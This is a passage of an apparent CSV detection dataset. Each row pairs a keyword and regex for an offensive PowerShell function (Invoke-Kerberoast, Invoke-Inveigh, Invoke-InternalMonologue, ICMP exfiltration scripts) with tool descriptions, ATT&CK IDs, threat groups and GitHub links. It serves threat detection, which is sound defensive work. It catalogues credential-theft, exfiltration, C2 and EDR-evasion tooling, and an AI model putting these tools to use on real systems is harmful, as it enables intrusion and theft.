- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*invoke-hostenum -*",".{0,1000}invoke\-hostenum\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-HostEnum*",".{0,1000}Invoke\-HostEnum.{0,1000}","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*Invoke-HostRecon*",".{0,1000}Invoke\-HostRecon.{0,1000}","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","414","117","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" "*invoke-hostscan*",".{0,1000}invoke\-hostscan.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-HotFixVulnCheck*",".{0,1000}Invoke\-HotFixVulnCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-HTTPServer*",".{0,1000}Invoke\-HTTPServer.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","A basic web server to use for accessing the emailviewer that is output from Invoke-SearchMailbox","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-IcmpDownload*",".{0,1000}Invoke\-IcmpDownload.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","294","60","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Invoke-IcmpDownload.ps1*",".{0,1000}Invoke\-IcmpDownload\.ps1.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","294","60","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Invoke-IcmpUpload.ps1*",".{0,1000}Invoke\-IcmpUpload\.ps1.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","294","60","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Invoke-ImmersiveFileReader*",".{0,1000}Invoke\-ImmersiveFileReader.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Open restricted files with the immersive reader","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-ImpersonateUser*",".{0,1000}Invoke\-ImpersonateUser.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-InjectGEvent*",".{0,1000}Invoke\-InjectGEvent.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-InjectGEventAPI*",".{0,1000}Invoke\-InjectGEventAPI.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-InjectOAuthApp -AppName *",".{0,1000}Invoke\-InjectOAuthApp\s\-AppName\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-InjectOAuthApp*",".{0,1000}Invoke\-InjectOAuthApp.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Injects an app registration into the tenant","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-InstalledProgramsCheck*",".{0,1000}Invoke\-InstalledProgramsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-InstalledServicesCheck*",".{0,1000}Invoke\-InstalledServicesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-InstalledServicesCheck*",".{0,1000}Invoke\-InstalledServicesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Interceptor*",".{0,1000}Invoke\-Interceptor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Interceptor.ps1*",".{0,1000}Invoke\-Interceptor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-InternalMonologue*",".{0,1000}Invoke\-InternalMonologue.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-Internalmonologue*",".{0,1000}Invoke\-Internalmonologue.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Internalmonologue*",".{0,1000}Invoke\-Internalmonologue.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-InternalMonologue.ps1*",".{0,1000}Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Invoke-Inveigh*",".{0,1000}Invoke\-Inveigh.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-InveighRelay*",".{0,1000}Invoke\-InveighRelay.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-InveighRelay.ps1*",".{0,1000}Invoke\-InveighRelay\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-InviteGuest*",".{0,1000}Invoke\-InviteGuest.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Invites a guest user to the tenant","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-IR*",".{0,1000}Invoke\-IR.{0,1000}","offensive_tool_keyword","Github Username","powershell forensic tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/Invoke-IR","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-IronCyclone*",".{0,1000}Invoke\-IronCyclone.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Invoke-JSRatRegsvr*",".{0,1000}Invoke\-JSRatRegsvr.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-JSRatRegsvr*",".{0,1000}Invoke\-JSRatRegsvr.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-JSRatRundll*",".{0,1000}Invoke\-JSRatRundll.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-JSRatRundll*",".{0,1000}Invoke\-JSRatRundll.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-JuicyPotato*",".{0,1000}Invoke\-JuicyPotato.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*invoke-kerberoast *",".{0,1000}invoke\-kerberoast\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*invokekerberoast*",".{0,1000}invokekerberoast.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" 